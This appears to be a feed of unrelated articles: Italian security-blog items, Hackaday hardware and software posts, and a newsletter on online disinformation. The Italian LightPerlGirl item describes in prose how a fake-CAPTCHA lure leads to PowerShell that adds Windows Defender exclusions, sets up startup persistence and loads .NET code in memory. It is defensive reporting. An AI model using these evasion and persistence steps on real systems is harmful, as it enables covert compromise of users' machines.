Il presente articolo e le attività descritte sono frutto di una collaborazione tra FBK, Università di Trento ed Hackerhood. Si ringraziano Manuel Roccon, Matteo Bridi, Alessandro Molinari, Domenico Siracusa, Claudio Facchinetti e Daniele Santoro.
L'articolo CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta proviene da il blog della sicurezza informatica.
LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click
Un nuovo malware chiamato LightPerlGirl ha attirato l’attenzione degli esperti di sicurezza informatica per il suo insolito e pericoloso schema di penetrazione dei dispositivi. L’attacco si basa sulla tecnica ClickFix : una finta finestra pop-up CAPTCHA che avvia una complessa sequenza di azioni utilizzando PowerShell e metodi che consentono al codice dannoso di nascondersi completamente dalle soluzioni di sicurezza.
Il nome del malware trae ispirazione dalla riga interna del copyright: “Copyright (c) LightPerlGirl 2025“. La campagna di distribuzione del malware è stata notata per la prima volta dai ricercatori di Todyl dopo aver rilevato script PowerShell anomali su un dispositivo client. Questo è diventato il punto di partenza per indagare su un complesso schema di infezione a più fasi in grado di bypassare i meccanismi di difesa tradizionali.
L’infezione inizia visitando un sito compromesso, il più delle volte sulla piattaforma WordPress, come una risorsa di viaggio. Le pagine ospitano codice JavaScript dannoso, mascherato da controllo di sicurezza di provider noti come Cloudflare. Lo script richiama una finestra con un CAPTCHA falso che, interagendo con esso, richiede all’utente di avviarlo tramite la funzione Esegui di Windows, essenzialmente la prima fase dell’attacco.
Questo comando contatta il server C&C all’indirizzo “cmbkz8kz1000108k2carjewzf[.]info”, da cui viene scaricato il seguente script di PowerShell. Viene eseguito interamente in memoria e include tre moduli: HelpIO, Urex ed ExWpL. Ognuno di essi esegue attività specifiche volte a proteggere il malware nel sistema e a renderlo invisibile.
Il modulo HelpIO richiede i diritti amministrativi tramite la finestra UAC standard e aggiunge quindi un’eccezione a Windows Defender per la directory “C:\Windows\Temp”. Ciò consente il salvataggio dei componenti successivi senza generare allarmi nei programmi antivirus. Urex garantisce quindi una presenza persistente nel sistema scaricando un file bat chiamato “LixPay.bat” e posizionandolo nella directory Temp esclusa. Crea inoltre un collegamento all’avvio in modo che venga eseguito a ogni avvio del sistema.
L’elemento più complesso, ExWpL, non utilizza affatto il file system. Decrittografa un assembly .NET codificato in base64 e lo esegue direttamente in memoria utilizzando il metodo System.Reflection.Assembly.Load(). Questo approccio evita qualsiasi interazione con il disco, il che complica notevolmente il rilevamento.
Dopo aver completato tutte le fasi, il malware mantiene una connessione stabile con il server di comando e controllo, consentendo agli aggressori di eseguire comandi in tempo reale e di scaricare nuovi componenti senza lasciare tracce nel file system.
Secondo Todyl, il fattore critico dell’infezione è stata la mancanza di sistemi di protezione degli endpoint sul dispositivo attaccato, che ha consentito l’esecuzione dello script iniziale. Tuttavia, il team dell’azienda è riuscito a isolare l’host infetto utilizzando il proprio SIEM e l’analisi dei log degli script di PowerShell.
La chiave dell’attacco è il coinvolgimento dell’utente. Tutto inizia con un singolo clic su un CAPTCHA “sicuro” che esegue effettivamente il codice. Todyl sottolinea che nessun controllo di sicurezza dovrebbe richiedere l’inserimento manuale di comandi. Inoltre, si raccomanda di installare urgentemente strumenti di protezione completa degli endpoint e di utilizzare gli indicatori di compromissione forniti nel report per condurre un’analisi dell’infrastruttura.
LightPerlGirl è un esempio di come l’elegante ingegneria sociale e la sofisticatezza tecnica si fondano per creare una minaccia che non può essere ignorata.
L'articolo LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click proviene da il blog della sicurezza informatica.
Smallest Gaming Mouse Has Crazy Fast Polling Rate And Resolution
[juskim] wanted to build a tiny mouse, but it couldn’t just be any mouse. It had to be a high-tech gaming mouse that could compete with the best on raw performance. The results are impressive, even if the final build is perhaps less than ideal for pro-level gameplay.
The build riffs on an earlier build from [juskim] that used little more than a PCB and a 3D-printed housing to make a barebones skeleton mouse. However, this one ups the sophistication level. At the heart of the build is the nRF54L15 microcontroller, which is paired with a PAW3395 mouse sensor which is commonly used in high-end gaming mice. It offers resolution up to 26K DPI for accurate tracking, speeds up to 650 ips, and 8 kHz sampling rates. Long story short, if you want fine twitch control, this is the sensor you’re looking for. The sensor and microcontroller are laced together on a custom PCB with a couple of buttons, a battery, and a charging circuit, and installed in a barebones 3D-printed housing to make the final build as small as possible.
The only real thing letting the design down is the mouse’s key feature—the size. There’s very little body to grab on to and it’s hard to imagine being able to play most fast-paced games at a high level with such a tiny device. Nevertheless, the specs are hardcore and capable, even if the enclosure isn’t.
[juskim] loves building tiny peripherals; we’ve featured his fine work before, too. Video after the break.
youtube.com/embed/XgV3BgWfUFY?…
Reservoir Sampling, or How to Sample Sets of Unknown Size
Selecting a random sample from a set is simple. But what about selecting a fair random sample from a set of unknown or indeterminate size? That’s where reservoir sampling comes in, and [Sam Rose] has a beautifully-illustrated, interactive guide to how reservoir sampling works. As far as methods go, it’s as elegant as it is simple, and particularly suited to fairly sampling dynamic datasets like sipping from a firehose of log events.
While reservoir sampling is simple in principle it’s not entirely intuitive to everyone. That’s what makes [Sam]’s interactive essay so helpful; he first articulates the problem before presenting the solution in a way that makes it almost self-evident.
[Sam] uses an imaginary deck of cards to illustrate the problem. If one is being dealt cards one at a time from a deck of unknown size (there could be ten cards, or a million), how can one choose a single card in a way that gives each an equal chance of having been selected? Without collecting them all first?
In a nutshell, the solution is to make a decision every time a new card arrives: hold onto the current card, or replace it with the new one. Each new card is given a 1/n chance of becoming held, where n is the number of cards we’ve seen so far. That’s all it takes. No matter when the dealer stops dealing, each card that has been seen will have had an equal chance of ending up the one selected.
There are a few variations which [Sam] also covers, and practical ways of applying it to log collection, so check it out for yourself.
If [Sam]’s knack for illustrating concepts in an interactive way is your jam, we have one more to point out. Our own Al Williams wrote a piece on Turing machines; the original “universal machine” being a theoretical device with a read/write head and infinite paper tape. A wonderful companion to that article is [Sam]’s piece illustrating exactly how such a Turing machines would work in an interactive way.
Hack Swaps Keys for Gang Signs, Everyone Gets In
How many times do you have to forget your keys before you start hacking on the problem? For [Binh], the answer was 5 in the last month, and his hack was to make a gesture-based door unlocker. Which leads to the amusing image of [Binh] in a hallway throwing gang signs until he is let in.
The system itself is fairly simple in its execution: the existing deadbolt is actuated by a NEMA 17 stepper turning a 3D printed bevel gear. It runs 50 steps to lock or unlock, apparently, then the motor turns off, so it’s power-efficient and won’t burn down [Binh]’s room.
The software is equally simple; mediapipe is an ML library that can already do finger detection and be accessed via Python. Apparently gesture recognition is fairly unreliable, so [Binh] just has it counting the number of fingers flashed right now. In this case, it’s running on a Rasberry Pi 5 with a webcam for image input. The Pi connects via USB serial to an ESP32 that is connected to the stepper driver. [Binh] had another project ready to be taken apart that had the ESP32/stepper combo ready to go so this was the quickest option. As was mounting everything with double-sided tape, but that also plays into a design constraint: it’s not [Binh]’s door.
[Binh] is staying in a Hacker Hotel, and as you might imagine, there’s been more penetration testing on this than you might get elsewhere. It turns out it’s relatively straightforward to brute force (as you might expect, given it is only counting fingers), so [Binh] is planning on implementing some kind of 2FA. Perhaps a secret knock? Of course he could use his phone, but what’s the fun in that?
Whatever the second factor is, hopefully it’s something that cannot be forgotten in the room. If this project tickles your fancy, it’s open source on GitHub, and you can check it out in action and the build process in the video embedded below.
After offering thanks to [Binh] for the tip, the remaining words of this article will be spent requesting that you, the brilliant and learned hackaday audience, provide us with additional tips.
youtube.com/embed/yNJkpo-19DI?…
Subpixel Rendering For Impossibly Small Terminal Text
When it comes to text, how small is too small? The experts say a six point font is the minimum for readability, but as [James Bowman] shows us, you can get away with half of that.
The goal is to produce a 40-character display on a 24 mm x 24 mm LCD that has a resolution of 240 x 240 to show a serial terminal (or other data) on the “TermDriver2” USB-to-Serial adapter. With 24 lines, that’s a line per millimeter: very small text. Three points, to be precise, half what the experts say you need. Diving this up into 40 columns gives a character cell of six by nine pixels. Is it enough?
The raw font on the left, the subpixel rendering on the right. For once, it’s better if you don’t click to enlarge.
Not by itself, no. That’s where the hack comes in: sub-pixel rendering. After all, a “white” pixel on an LCD is actually three elements: a red, a green, and a blue subpixel, stacked side-by-each. Drive each of those subpixels independently and 240 pixels now becomes 720. That’s plenty for a 40 column terminal.
The article discusses how, in general terms, they pulled off the subpixel rendering and kept the font as legible as possible. We think it’s a good try, though the colored fringe around the characters can be uncomfortable to look at for some people — and then we can’t forget the physical size of the characters being 1 mm tall.
If this trick were being used on a larger display with a 240-wide resolution, we’d say “yes, very legible, good job!”– but at this size? We hope we can find our reading glasses. Still, it’s a neat trick to have in your back pocket for driving low-resolution LCDs.
It may not surprise you that aside from improving legibility, subpixel rendering is also used for pixel (er, sub-pixel) art.
The full set of glyphs in their subpixel-rendered glory.
FLOSS Weekly Episode 839: I Want to Get Paid Twice
This week Jonathan chats with benny Vasquez about AlmaLinux! Why is AlmaLinux the choice for slightly older hardware? What is the deal with RISC-V? And how does EPEL fit in? Tune in to find out!
- linkedin.com/in/bennyvasquez/
- almalinux.org
- almalinux.org/blog/2025-04-24-…
- almalinux.org/blog/2025-06-26-…
youtube.com/embed/5G-wIcFLrnM?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/07/02/floss-…
South Korea Brought High-Rise Fire Escape Solutions To The Masses
When a fire breaks out in a high-rise building, conventional wisdom is that stairwells are the only way out. Lifts are verboten in such scenarios, while sheer height typically prevents any other viable route of egress from tall modern buildings. If the stairs are impassable, or you can’t reach them, you’re in dire peril.
In South Korea, though, there’s another option for escape. The answer involves strapping on a harness and descending down ropes hanging off the side of the building, just like in an action movie. It might sound terrifying, but these descending lifeline devices have become a common part of fire safety infrastructure across the country.
Going Down
The concept is elegantly simple—tall buildings like apartments and hotels feature compact rope escape devices that can be quickly deployed from windows or balconies. These allow people to control their descent down the exterior of a building in the event that there is no other route of escape. While fleeing a building down a rope is typically the preserve of fictional spies or trained climbers, these carefully engineered systems are designed for use by ordinary people in emergency situations.
youtube.com/embed/tboKzq3lx8M?…
The typical Korean descending lifeline comes as a kit with some simple components. It consists of a rope or cable, a friction-based descent control mechanism, and a harness system that can be donned quickly by sliding under the arms and tightening a strap. Deploying the device is relatively simple. The rope reel is attached to a large deployable hook that is firmly mounted to the building’s wall, using a screw-threaded coupling. The rope is then thrown out the window. At this point, the user merely needs to attach the harness and tighten it prior to leaving the building.A typical lifeline descent kit, manufactured by Kfire. Credit: Kfire
When exiting the window, the user is instructed to face the wall on the way down, using their hands and/or feet to control the descent. Ultimately, though, the mechanical speed regulator ensures a safe pace of descent. The devices only allow the descent of one person at at time. However, each end of the rope has a harness. Thus, when one user has descended to ground level, the next person can grab the harness at the other end which has ascended to the window, and begin their descent. This can continue for as many people as needed.
Key to these devices is their focus on simplicity. The descent control mechanism uses a geared braking system that automatically limit the speed of descent to 1.5 meters/sec or less, preventing the user from descending too quickly even if they panic and release their grip. The lifelines are also sold in a range of different lengths to suit the heights of individual floors in a building. This is important to ensure that as the user hits the ground, the other end of the rope has carried the other harness back up to the floor for the next user. The longest variants typically sold are 45 meters in length, intended for buildings up to 15 stories tall. Limits of practicality mean that while these lifelines are useful for many buildings, they’re perhaps not applicable to taller skyscrapers where such escape would be more difficult.
The engineering challenge here isn’t just mechanical. Automatic rope descent systems are a well understood technology, as are hooks and brackets rated to carry human weight for climbing or otherwise. The real challenge comes down to human factors—in that these systems need to be something people can figure out how to use under conditions of extreme stress. The devices need to be intuitive enough that someone who has never used one before can figure it out while a fire rages behind them. It’s one thing to learn how to use a rope descent system by watching a video and trying the equipment at a calm training session. It’s another thing entirely to do so while a fire rages in the hotel hallway behind you.
While these lifeline systems are relatively simple, they’re still a lot more complicated to use than something like an airliner life jacket. Requiring an inexperienced end user to thread a fitting on a rope coupler without dropping it out the window in a panic situation is a tall ask. Still, the lifelines provide a useful additional escape option. It may not be the easiest way out of the building, or anybody’s first choice, but when there’s no other option, it’s good to have.
South Korea’s adoption of these systems reflects both the country’s high-rise-heavy urban landscape and a pragmatic approach to disaster preparedness. Many apartment buildings and hotels are now required to have these devices installed. The devices are typically mounted in weatherproof boxes near windows or on balconies, ready for deployment when traditional escape routes are compromised. In some cases, the rugged boxes the lifelines come in can even be used as a step-up to ease egress out of higher windows.
Perhaps most importantly, these systems represent a shift in traditional thinking about fire safety. In most jurisdictions, the idea of asking average people to belay down a building is considered untenable—too dangerous and too complicated. In South Korea, the lifelines are on hand, and put control back in the hands of building occupants. When every second counts and traditional escape routes have failed, having a lifeline system could mean the difference between life and death. It’s a sobering reminder that sometimes the best high-tech solution is one that lets people save themselves.
Making a Smarter Laptop Cooler
[Bogdan Micea] uses a laptop cooler, but was a bit annoyed that his cooler would run at the same power no matter how hard the laptop was working. Rather than keep adjusting the cooler’s power manually, he automated it by installing an Arduino Pro Micro as a controller in the cooler and writing a Rust controller application for his computer.
[Bogdan]’s cooler is controlled by four buttons, which can have different functions depending on how long they’re pressed. After mapping out their functionality and minor quirks, [Bogdan] soldered four transistors in parallel with the buttons to let the Arduino simulate button presses; another four Arduino pins accept input from the buttons to monitor their state. The Arduino USB port connects to the cooler’s original USB power input, so the cooler looks superficially unchanged. When the cooler starts up, the Arduino sets it to a known state, then monitors the buttons. Since it can both monitor and control the buttons, it can notify the computer when the cooler’s state changes, or change the state when the computer sends a command.
On the computer’s part, the control software creates a system tray that displays and allows the user to change the cooler’s current activity. The control program can detect the CPU’s temperature and adjust the cooler’s power automatically, and the Arduino can detect the laptop’s suspend state and control power accordingly.
Somewhat surprisingly, this seems to be the first laptop cooler we’ve seen modified. We have seen a laptop cooler used to overclock a Teensy, though, and a laptop’s stock fans modified.
Why The Latest Linux Kernel Won’t Run On Your 486 And 586 Anymore
Some time ago, Linus Torvalds made a throwaway comment that sent ripples through the Linux world. Was it perhaps time to abandon support for the now-ancient Intel 486? Developers had already abandoned the 386 in 2012, and Torvalds openly mused if the time was right to make further cuts for the benefit of modernity.
It would take three long years, but that eventuality finally came to pass. As of version 6.15, the Linux kernel will no longer support chips running the 80486 architecture, along with a gaggle of early “586” chips as well. It’s all down to some housekeeping and precise technical changes that will make the new code inoperable with the machines of the past.
Why Won’t It Work Anymore?
The kernel has had a method to emulate the CMPXCH8B instruction for some time, but it will now be deprecated.
The big change is coming about thanks to a patch submitted by Ingo Molnar, a long time developer on the Linux kernel. The patch slashes support for older pre-Pentium CPUs, including the Intel 486 and a wide swathe of third-party chips that fell in between the 486 and Pentium generations when it came to low-level feature support.
Going forward, Molnar’s patch reconfigures the kernel to require CPUs have hardware support for the Time Stamp Counter (RDTSC) and CMPXCHG8B instructions. These became part of x86 when Intel introduced the very first Pentium processors to the market in the early 1990s. The Time Stamp Counter is relatively easy to understand—a simple 64-bit register that stores the number of cycles executed by the CPU since last reset. As for CMPXCHG8B, it’s used for comparing and exchanging eight bytes of data at a time. Earlier Intel CPUs got by with only the single-byte CMPXCHG instruction. The Linux kernel used to feature a piece of code to emulate CMPXCHG8B in order to ease interoperability with older chips that lacked the feature in hardware.
The changes remove around 15,000 lines of code. Deletions include code to emulate the CMPXCHG8B instruction for older processors that lacked the instruction, various emulated math routines, along with configuration code that configured the kernel properly for older lower-feature CPUs.
Basically, if you try to run Linux kernel 6.15 on a 486 going forward, it’s just not going to work. The kernel will make calls to instructions that the chip has never heard of, and everything will fall over. The same will be true for machines running various non-Pentium “586” chips, like the AMD 5×86 and Cyrix 5×86, as well as the AMD Elan. It’s likely even some later chips, like the Cyrix 6×86, might not work, given their questionable or non-existent support of the CMPXCHG8B instruction.
Why Now?
Molnar’s reasoning for the move was straightforward, as explained in the patch notes:
In the x86 architecture we have various complicated hardware emulation
facilities on x86-32 to support ancient 32-bit CPUs that very very few
people are using with modern kernels. This compatibility glue is sometimes
even causing problems that people spend time to resolve, which time could
be spent on other things.
Indeed, it follows on from earlier comments by Torvalds, who had noted how development was being held back by support for the ancient members of Intel’s x86 architecture. In particular, the Linux creator questioned whether modern kernels were even widely compatible with older 486 CPUs, given that various low-level features of the kernel had already begun to implement the use of instructions like RDTSC that weren’t present on pre-Pentium processors. “Our non-Pentium support is ACTIVELY BUGGY AND BROKEN right now,” Torvalds exclaimed in 2022. “This is not some theoretical issue, but very much a ‘look, ma, this has never been tested, and cannot actually work’ issue, that nobody has ever noticed because nobody really cares.”Intel kept i486 chips in production for a good 18 years, with the last examples shipped out in September 2007. Credit: Konstantin Lanzet, CC BY-SA 3.0
Basically, the user base for modern kernels on old 486 and early “586” hardware was so small that Torvalds no longer believed anyone was even checking whether up-to-date Linux even worked on those platforms anymore. Thus, any further development effort to quash bugs and keep these platforms supported was unjustified.
It’s worth acknowledging that Intel made its last shipments of i486 chips on September 28, 2007. That’s perhaps more recent than you might think for a chip that was launched in 1989. However, these chips weren’t for mainstream use. Beyond the early 1990s, the 486 was dead for desktop users, with an IBM spokesperson calling the 486 an “ancient chip” and a “dinosaur” in 1996. Intel’s production continued on beyond that point almost solely for the benefit of military, medical, industrial and other embedded users.Third-party chips like the AMD Elan will no longer be usable, either. Credit: Phiarc, CC-BY-SA 4.0
If there was a large and vocal community calling for ongoing support for these older processors, the kernel development team might have seen things differently. However, in the month or so that the kernel patch has been public, no such furore has erupted. Indeed, there’s nothing stopping these older machines still running Linux—they just won’t be able to run the most up-to-date kernels. That’s not such a big deal.
While there are usually security implications around running outdated operating systems, the simple fact is that few to no important 486 systems should really be connected to the Internet anyway. They lack the performance to even load things like modern websites, and have little spare overhead to run antiviral software or firewalls on top of whatever software is required for their main duties. Operators of such machines won’t be missing much by being stuck on earlier revisions of the kernel.
Ultimately, it’s good to see Linux developers continuing to prune the chaff and improve the kernel for the future. It’s perhaps sad to say goodbye to the 486 and the gaggle of weird almost-Pentiums from other manufacturers, but if we’re honest, few to none were running the most recent Linux kernel anyway. Onwards and upwards!
Finally, An Extension To Copyright Law We Can Get Behind
Normally when a government extends a piece of copyright law we expect it to be in the favour of commercial interests with deep pockets and little care for their consumers. But in Denmark they do things differently it seems, which is why they are giving Danes the copyright over their own features such as their faces or voices. Why? To combat deepfakes, meaning that if you deepfake a Dane, they can come after you for big bucks, or indeed kronor. It’s a major win, in privacy terms.
You might of course ask, whether it’s now risky to photograph a Dane. We are not of course lawyers here but like any journalists we have to possess a knowledge of how copyright works, and we are guessing that the idea in play here is that of passing off. If you take a photograph of a Volkswagen you will have captured the VW logo on its front, but the car company will not sue you because you are not passing off something that’s not a Volkswagen as the real thing. So it will be with Danes; if you take a picture of their now-copyrighted face in a crowd you are not passing it off as anything but a real picture of them, so we think you should be safe.
We welcome this move, and wish other countries would follow suit.
Pope Francis, Midjourney, Public domain, (Which is a copyright story all of its own!)
The Fake News Factory
KIA ORA. IT'S WEDNESDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and this week's edition comes to you from New Zealand. I'm taking a couple weeks off, so the next newsletter (for paying subscribers) will hit inboxes on July 14.
I'm trying something different this week.
Ahead of the 2024 global megacycle of elections, I had the idea of explaining the links between the digital tactics that have now become all too common in how politicians get elected from Pakistan and Portugal to the United Kingdom and the United States.
Life, however, got in the way. (The best I did was this package around artificial intelligence, disinformation and elections.) So, I'm taking another crack at how we all now live in the Fake News Factory.
Let's get started:
The democratization of online tools and tactics
THE LAST DECADE REPRESENTED the second generation of social media. It was an era where the shine had significantly come off Facebook and Twitter (now X.) It was a time of repeated whistleblower reports about tech giants understanding how their content algorithms were pushing people toward polarizing and extremist content. It was a time of serious commercialization of these platforms by politicians eager to bombard would-be voters with billions of dollars of collective ad buys.
That era is now over. It's not that Facebook and YouTube are no longer important. They are — especially YouTube which has transformed itself into a global rival for traditional television in a way that has upended the advertising industry and fundamentally reshaped how anyone under 30-years old consumes video content. But where the 2015-2025 period was primarily defined by the dominance of a small number of Silicon Valley platforms, we're now in an era where fringe platforms, niche podcasts and the likes of vertical dramas have divided people into small online communities that rarely interact with each other.
This was happening before 2025. But we have reached an inflection point in how the online information ecosystem works. It has now shattered into a million pieces where people gravitate to like-minded individuals in siloed platforms. There is no longer a collective set of facts or events that form the foundation for society. Instead, most of us seek out opinions that already reflect our worldview, often demonizing those who we disagree with in an "othering" that only fuels polarization, misunderstanding and, potentially, offline harm.
And you thought this would be an uplifting newsletter.
Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.
Here's what paid subscribers read in June:
— Debunking popular misconceptions around platform governance; The demise of the open, interoperable internet is upon us; How oversight over AI has drastically slowed since 2023. More here.
— Internal fighting among Big Tech giants has hobbled any pushback against antitrust enforcement; It's time to rethink our approach to tackling foreign interference; Tracking Europe's decade-long push to combat online disinformation. More here.
— Why the G7 has always been a nothing-burger on tech policy; You should keep an eye out on 'digital public infrastructure' in the battle around tech sovereignty; the United Kingdom's expanding online safety investigations. More here.
— The US is sending seriously mixed messages about its approach to tech policy; How the UK became the second place in the world to mandate social media data access; Artificial intelligence will upend how we consume news online. More here.
This bifurcation in how people consume online content has made it next to impossible for foreign interference operations to flourish like they once did. See, there's a positive point. Even two years ago, the Russians could flood the zone with Kremlin talking points and receive a significant bump in online interactions. The Chinese never went in for that sort of thing — though have progressively targeted Western audiences mostly with overt propaganda in support of the Chinese Communist Party.
Now, such efforts are almost certainly doomed to fail. The siloing of social media usage has been married with a need for authenticity — that sense of belonging and insider knowledge that can only come from deep roots in communities that can smell out an imposter from a mile off. That authenticity is something that foreign (covert) campaigns routinely do badly at. State-backed operations don't know the insider lingo; they don't have the long-standing credibility built up over months/years; and they don't have personal ties required to fully embed in the balkanization of social media.
But where state-backed actors remain a threat is in the amplification of existing domestic influencers often by automated bot-nets and other AI-powered tools aimed at juicing social media giants' recommender systems. The companies say they are on top of these covert tactics. But every time there's a massive global political event (or local election), Kremlin-backed narratives keep popping up in people's feeds — often via local influencers whose views just happen to align with Moscow. These individuals are mostly not connected with Russia. But they have likely received a boost from Kremlin-aligned groups seeking to spread those messages to the widest audience possible.
It's about domestic, not foreign
IN TRUTH, STATE-BACKED ACTORS are a very public sideshow to the main event driving ongoing toxicity within the information environment: domestic actors. Be they influencers, scammers, politically-aligned media or, ahem, politicians, they are the key instigator for much of the current. Many of these domestic players see some form of benefit from spreading harm, falsehoods and, in some cases, illegality online. That, it should be added, is then amplified by social media platforms' algorithms that have been programmed to entice people to stay on these networks, often by promoting the most divisive content as possible.
Such a dynamic has been around for years. It isn't a left- or right-wing issue — though repeated studies have shown that conservative social media users promote more falsehoods than their liberal counterparts. It's a basic fact that domestic social media users both know their audience better than foreign influence campaigns and that they have greater credibility with siloed local audiences than Russia, China or Iran.
What has shifted, though, is the ability for almost anyone to run a domestic influence campaign — or, you know, a mainstream political campaign — as if they had the resources of the Kremlin-backed Internet Research Agency. Over the last five years, the toolkit required to skew social media has become readily accessible and significantly cheaper than it once was. That has been spurred on even more through the rapid growth of AI-enabled tools (more on that below.) But everything from a Bangladesh-based bot farm to a Philippines-based dark arts public relations has now become an off-the-shelf product that can be bought via a few clicks on a public-facing website.
This shift has not gone unnoticed by criminals. In 2025, the highest volume of attacks in the (Western) information environment now come from those seeking to dupe social media users out of money — and not to alter their political allegiances. Yes, the impact on politics can have significantly bigger effects. But the rise of "financial disinformation" in terms of frauds and scams promoted on social media has reached pandemic proportions.
Collectively, such digital efforts to swindle people out of money now costs billions of dollars a year, and even that is likely a significant underestimate. It's also directly linked to a crime (aka fraud) when scammers buy social media adverts to convince people to sign up to Ponzi and other get-rich-quick schemes. I did a quick search, via Meta's ad library in six different countries, for such financial scams, and found a prolific amount of advertising that promoted such disinformation. Some of it was blatantly illegal, some of it was not (I'm not linking to it to avoid amplification.) But the fact such scam artists are openly flaunting the law should be a worry for us all.
This democratization of disinformation has only gone from bad to worse with AI tools. Be it cloning technology to spoof a victim's voice, AI-generated images attacking a political opponent or next-generation video software that creates falsehoods from scratch within minutes, the cost for generating toxicity, hate and polarization is now almost zero. Yes, these tools can also generate joy, laughter and entertainment. But the last six months have seen a rapid rise in AI-generated slop that is quickly moving from being easy to detect to being indistinguishable from the real thing.
Trust me, I'm a regulator
THIS YEAR MARKS THE FIRST TIME ON RECORD that several countries' online safety rulebooks are in full operation. Yes, Australia got things started almost five years ago. But with the European Union's Digital Services Act and the UK's Online Safety Act, the Western world has the first signs of what a well-resourced regulatory environment looks like when it comes to keeping people safe online.
Sigh.
It's not that the European Commission and Ofcom (disclaimer: I sit on an independent advisory committee at the British regulator, so anything I say here is done so in a personal capacity) aren't doing their best. They are. It's just both are fighting a 2020 war against perceived threats within the online information environment, and just haven't kept pace with the fast-evolving tactics, some of which I outlined above.
To a degree, the time lag is understandable. Regulators are always going to be behind the curve on the latest threats. Both agencies are still staffing up and learning the ropes of their new rulebooks. How successful either the EU or UK will be in making their online worlds safer for citizens won't be known for at least five years, at the earliest.
But there have been some serious mistakes, especially from the European Commission. Let's leave aside the political nature of the first investigations under the Digital Services Act. And let's leave aside the internal bureaucratic infighting that was always going to arise from such a powerful — and well-resourced — piece of legislation.
For me, the biggest error was how Ursula von der Leyen framed the new rules as almost exclusively a means for combatting Russian interference. That was done primarily to secure her second tenure as European Commission president. But the characterization of the Digital Services Act as an all-powerful mechanism to thwart the Kremlin's covert influence operations has continued well into this year — most notably in the two presidential elections in Romania.
Sign up for Digital Politics
Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.
Subscribe
Email sent! Check your inbox to complete your signup.
No spam. Unsubscribe anytime.
Let's be clear. These online safety rules are many things. But, at their heart, they are wonky, bureaucratic and cumbersome mandatory requirements for platforms to abide by their own internal policies against illegal content. They are not about Russian disinformation. And they certainly are not about censorship.
Weaponization and unknown unknowns
And that takes me to the final big concern within the Fake News Factory: the weaponization of online safety rules. Since 2016, there have been those within the US that pushed back hard against platforms' efforts to quell illegal and abusive content. That has spiralled into conspiratorial claims that a Censorship Industrial Complex — made up of governments, social media giants and outsiders — is trying to illegally silence predominantly rightwing voices, often via new online safety legislation.
US President Donald Trump's administration has made it clear what it thinks of these rules — and has pushed back hard. It has threatened retaliatory tariffs against countries with online safety rules on the books. It has threatened to ban anyone who allegedly tries to censor Americans from entering the country. It has accused both the UK and EU of infringing on US First Amendment rights.
These attacks against what are, essentially, legal commitments obligating companies to live by their own internal rules — and to demonstrate that they have done so — are now part of the conversation in other Western countries. That includes (mostly) right-wing lawmakers across Europe seeking to weaken these online safety rules, accusing others of censoring conservative viewpoints and mimicking many of the long-standing talking points from their US counterparts.
It's true, particularly during the pandemic, that social media companies made content moderation decisions with imperfect facts. Some posts were unfairly removed or downranked as these firms responded, in real time, to government efforts to amplify scientifically correct information. But the rise of conspiracy theories, which insinuated a mass censoring of online voices, just didn't bear out with the evidence at hand. And that came after repeated reports from the US House of Representatives select subcommittee on the weaponization of the federal government.
If there was evidence of such abuse, then I would be the first to champion such findings. But as we enter the second half of the year, there is one core underlying fact that underpins everything I've written so far: no one has a clue about what happens on these platforms.
Long-time Digital Politics readers will have heard mego on about this for months — and, to be fair, it's part of my day job to look into this issue. But how the complex recommender system algorithms interact with people's individual posts, paid-for advertising and wider efforts to influence people online remains a black box. What I have outlined above, for instance, is based on my own research, what I understand anecdotally about how these platforms work and discussions with policymakers, tech executives and other experts.
The Fake News Factory is my own imagining of how the current online information ecosystem interacts and shapes the world around us. But without better awareness — via mandatory requirements that these firms open up to independent scrutiny, transparency and accountability — about the inner workings of these platforms, that imagining will remain incomplete, at best.
We are entering a new generation of social media with limited awareness, mass balkanization and an increasingly politicization of what should be clear objectives of keeping everyone safe online. How long this era will stick around for is anyone's guess. But, for now, the Fake News Factory remains as strong as ever.
What I'm reading
— The Organization for Economic Cooperation and Development analyzed the so-called age assurance policies from 50 online services — most of which did not have checks in place. More here.
— The team at the DSA Observatory did a deep dive into how individuals, non-profit organizations and consumer groups can bring private enforcement actions under the EU's Digital Services Act.
— The UK's Competition and Markets Authority laid out its rationale for why it had designated Google a so-called "strategic market status" under the country's new digital antitrust rules. More here.
— OpenAI submitted recommendations to the upcoming US AI Action Plan. The words "freedom" and "PRC" are mentioned repeatedly throughout. More here.
— Researchers at USC Annenberg looked at how the media covered the negative side of social media/technology, and found that the companies are rarely blamed. More here.
Adding Automatic Emergency Braking To An RC Car
Modern RC cars can be pretty darn fast. That’s fun and all, but it also makes it easy to crash them into things. This problem inspired [Narrow Studios] to whip up something to offer a bit of protection.
The concept is simple enough—the RC car just needs some way to detect obstacles and stop before hitting them. The build relies on ultrasonic sensors as rangefinders to spot solid objects in the path of the vehicle. An Arduino Nano is in charge of reading the sensors. When it appears the car is approaching a wall or similar obstacle, it fires off a PWM signal to the car’s motor controller commanding it to brake. The additional hardware is held to the car with a bunch of custom printed brackets.
The setup isn’t perfect; the video notes that if you insist on accelerating quickly when close to a wall, you still have a fair chance of hitting it. That’s largely put down to the refresh time of the sensors and the overall system, which could be improved with further work. Still, if you’re always crashing your RC car into walls or curbs, this kind of thing might appeal to you.
We’ve featured some other great RC projects before, too.
youtube.com/embed/ht6-LsJQgek?…
Attacco ransomware a Radix: i dati governo svizzero finiscono nelle underground
Il governo svizzero ha annunciato che un attacco ransomware ai danni di un’organizzazione terza chiamata Radix ha causato la fuga di informazioni riservate da diverse agenzie federali. Secondo le autorità, gli aggressori hanno rubato dati dai sistemi Radix (che sono stati poi crittografati) e poi hanno pubblicato le informazioni sul dark web. Il National Cyber Security Centre (NCSC) del Paese sta attualmente analizzando i dati rubati per determinare quali agenzie governative siano state colpite.
